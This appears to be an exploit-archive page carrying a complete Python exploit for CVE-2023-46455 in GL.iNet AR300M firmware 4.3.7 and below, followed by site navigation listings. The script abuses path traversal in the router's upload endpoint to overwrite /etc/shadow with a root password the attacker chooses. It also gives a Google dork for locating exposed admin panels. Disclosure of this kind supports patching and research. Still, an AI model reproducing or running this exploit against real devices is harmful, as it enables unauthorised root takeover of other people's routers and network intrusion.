GL.iNet AR300M 4.3.7 Arbitrary File Write

GL.iNet AR300M 4.3.7 Arbitrary File Write: Posted Mar 4, 2024; Authored by Michele Di Bonaventura; GL.iNet AR300M versions 4.3.7 and below suffer from an arbitrary file writing vulnerability.; tags | exploit, arbitrary; advisories | CVE-2023-46455; SHA-256 | e817323e271309d595fea12a346185c0f2533237f054e543a5166f1f7881c859; Download | Favorite | View

GL.iNet AR300M 4.3.7 Arbitrary File Write

#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46455

import crypt
import requests
from sys import argv

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def craft_shadow_file(salted_password):
  shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
  shadow_content += 'daemon:*:0:0:99999:7:::\n'
  shadow_content += 'ftp:*:0:0:99999:7:::\n'
  shadow_content += 'network:*:0:0:99999:7:::\n'
  shadow_content += 'nobody:*:0:0:99999:7:::\n'
  shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
  shadow_content += 'stubby:x:0:0:99999:7:::\n'
  shadow_content += 'ntp:x:0:0:99999:7::\n'
  shadow_content += 'mosquitto:x:0:0:99999:7::\n'
  shadow_content += 'logd:x:0:0:99999:7::\n'
  shadow_content += 'ubus:x:0:0:99999:7::\n'
  return shadow_content

def replace_shadow_file(url, auth_token, shadow_content):
  data = {
    'sid': (None, auth_token),
    'size': (None, '4'),
    'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
    'file': ('shadow', shadow_content)
  }
  requests.post(url, files=data, verify=False)

def main(base_url, auth_token):
  print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')

  password = input('[?] New password for root user: ')
  salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)

  shadow_content = craft_shadow_file(salted_password)
  print('[+] Crafted shadow file:\n{}'.format(shadow_content))

  print('[*] Replacing shadow file with the crafted one')
  replace_shadow_file(base_url+'/upload', auth_token, shadow_content)

  print('[+] Done')

if __name__ == '__main__':
  if len(argv) < 3:
    print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
    exit(1)

  main(argv[1], argv[2])

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 63 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
kai6u 3 files
gabe_k 3 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

GL.iNet AR300M 4.3.7 Arbitrary File Write

GL.iNet AR300M 4.3.7 Arbitrary File Write

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GL.iNet AR300M 4.3.7 Arbitrary File Write

Share This

GL.iNet AR300M 4.3.7 Arbitrary File Write

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems